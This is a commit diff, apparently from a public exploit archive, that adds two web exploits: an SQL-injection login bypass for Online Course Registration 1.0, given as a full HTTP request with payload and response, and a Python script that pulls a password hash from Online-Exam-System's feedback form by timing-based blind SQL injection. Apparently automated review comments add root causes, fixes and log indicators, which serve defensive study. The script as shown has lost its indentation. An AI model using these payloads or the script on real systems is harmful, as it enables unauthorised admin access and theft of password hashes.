DB: 2020-06-06
2 changes to exploits/shellcodes Online Course Registration 1.0 - Authentication Bypass Online-Exam-System 2015 - 'feedback' SQL Injection
parent
533f33f3f4
commit
d0531a5e12
3 changed files with 76 additions and 0 deletions
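--- a/exploits/php/webapps/48559.txt
+++ b/exploits/php/webapps/48559.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Online Course Registration 1.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-06-05
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+# my website: bkpatron.com
+
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : admin/index.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+
+http://localhost/Online%20Course%20Registration/admin/index.php
+
+POST /Online%20Course%20Registration/admin/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 61
+Referer: http://localhost/Online%20Course%20Registration/admin/index.php
+Cookie: PHPSESSID=il6a0lzq8ndo1bb4672rd7cr3m
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined
+
+HTTP/1.1 302 Found
+Date: Thu, 04 Jun 2020 20:04:27 GMT
+Server: Apache/2.4.39 (Win64) PHP/7.3.5
+X-Powered-By: PHP/7.3.5
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+location: http://localhost/Online Course Registration/admin/change-password.php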
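Review bot: The write-up names `admin/index.php` as the vulnerable file but gives no root cause and no remediation, which is what someone maintaining a deployment of this application needs from the entry. The quote-based value in both fields and the 302 to `change-password.php` suggest the login query is assembled by string concatenation (inferred; the PHP source is not shown), so I would add a header line such as `# Mitigation: bind username/password with prepared statements and check the stored hash with password_verify()`. For detection, a POST to the admin login carrying quote characters in both `username` and `password`, answered by a 302 to an authenticated page, is a usable log signature. The captured request also publishes a concrete `PHPSESSID` value, which would be better redacted in a trace like this.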
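--- a/exploits/php/webapps/48560.py
+++ b/exploits/php/webapps/48560.py
@@ -0,0 +1,34 @@
+# Exploit Title: Online-Exam-System 2015 - 'feedback' SQL Injection
+# Date: 2020-06-04
+# Exploit Author: Gus Ralph
+# Vendor Homepage: https://github.com/sunnygkp10/
+# Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git
+# Affected Version: 2015
+# Tested on: Ubuntu
+# CVE : N/A
+
+import requests, string, time
+from sys import stdout
+
+URL = raw_input("Please enter the URL to attack (example http://localhost/Online-Exam-System/)\n")
+
+payload = "feedback' , '2020-06-04', '01:58:10am'),('1337','test','test@test.com','test',(SELECT CASE WHEN (SELECT EXISTS(SELECT password FROM user WHERE password REGEXP BINARY '^"
+payload2 = ".*'))=1 THEN sleep(5) ELSE sleep(0) END),'2020-06-04', '01:58:10am'); -- -"
+so_far = hash = ""
+while True:
+for i in string.digits + string.ascii_lowercase:
+so_far = hash + i
+payload_to_send = payload + str(so_far) + payload2
+data = {"name":"test","email":"test@test.com","subject":"test","feedback":payload_to_send}
+start = time.time()
+r = requests.post(URL + "feed.php", data = data)
+request_time = time.time() - start
+if request_time > 5:
+hash += i
+stdout.write(i)
+stdout.flush()
+break
+if len(hash) > 31:
+stdout.write("\n")
+print "Hash found: " + hash
+break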
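Review bot: The header block records title, author and version but neither the root cause nor a fix, and nothing warns that the script writes to the application it is pointed at. The `payload` string closes the application's own VALUES tuple and appends a second one, so each probe appears to add rows to the feedback table. I would add comment lines such as `# Root cause (presumed): feed.php builds its INSERT from unescaped POST fields; fix with prepared statements` and `# Side effect: every request inserts feedback rows (marker values '1337', test@test.com) that need cleanup after a lab run`. The outer `while True:` also has no exit when no candidate character produces a delay, so a non-matching run keeps posting to `feed.php` and inserting rows until it is killed. On the defensive side, the strings visible here (`REGEXP BINARY` and `sleep(` inside the `feedback` field, plus multi-second responses from `feed.php`) are the indicators to alert on in request logs or a WAF.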
|
@ -42785,3 +42785,5 @@ id,file,description,date,author,type,platform,port
|
|||
48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware,
|
||||
48557,exploits/multiple/webapps/48557.py,"Cayin Signage Media Player 3.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
|
||||
48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple,
|
||||
48559,exploits/php/webapps/48559.txt,"Online Course Registration 1.0 - Authentication Bypass",2020-06-05,BKpatron,webapps,php,
|
||||
48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php,
|
||||
|
|